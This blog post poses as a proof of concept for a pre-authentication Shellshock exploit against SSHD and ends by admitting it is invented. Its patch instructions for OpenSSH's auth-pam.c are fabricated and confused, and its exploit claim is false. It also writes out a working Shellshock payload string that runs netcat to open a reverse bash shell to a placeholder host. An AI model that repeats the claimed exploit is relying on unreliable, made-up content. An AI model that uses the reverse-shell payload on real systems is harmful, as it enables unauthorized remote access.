[POC] [Shellshock] Bash SSHD PreAuth Remote Exploit

The hype around the ShellShock bash exploit is circulating everywhere. Some have proven methods of:

However, most research suggests that the SSH daemon is only susceptible to the shell shock exploit AFTER a user has authenticated properly (post-auth).

However, if the environment variable is strung together in a certain way, the token can become registered earlier, during the pre-auth stage!! Below is a proof-of-concept (POC) demonstrating how to deliver the payload.

Delivering Payload

The payload cannot be sent simply through a command line argument. It needs to be sent raw thru TCP. The OpenSSH client software has to be modified:

Download openSSH-client source: 

Extract the source and edit auth-pam.c

Do a search for import_environments

line 313: Patch from

num_env = buffer_get_int(b);


num_env = buffer_get_int(b);

then a few lines below, change

for(i = 0; i < num_env; i++)
  sshpam_env[i] = buffer_get_string(b, NULL);

sshpam_env[num_env] = NULL;


for(i = 0; i < (num_env-1); i++)
  sshpam_env[i] = buffer_get_string(b, NULL);

sshpam_env[num_env-1] = "() { :; }; /bin/bash -c \"nc some_ip 65000 -e /bin/bash -i\"";
sshpam_env[num_env] = NULL;

The above example will cause SSHD to interpret the above as a part of its environment, executing a reverse shell (substitute some_ip with your reverse destination hostname DUH).

That’s it. Now, compile. to compile, you will need Zlib 1.1.4 or or greater (ealier 1.2.x versions have problems):

OpenSSL 0.9.6 or greater:

$ ./configure && make

I’m just kidding. I made all that up. AHA

Tagged with: , , , , , , , , , , , , ,
Posted in Bash

Leave a Reply

Your email address will not be published. Required fields are marked *


Skip to toolbar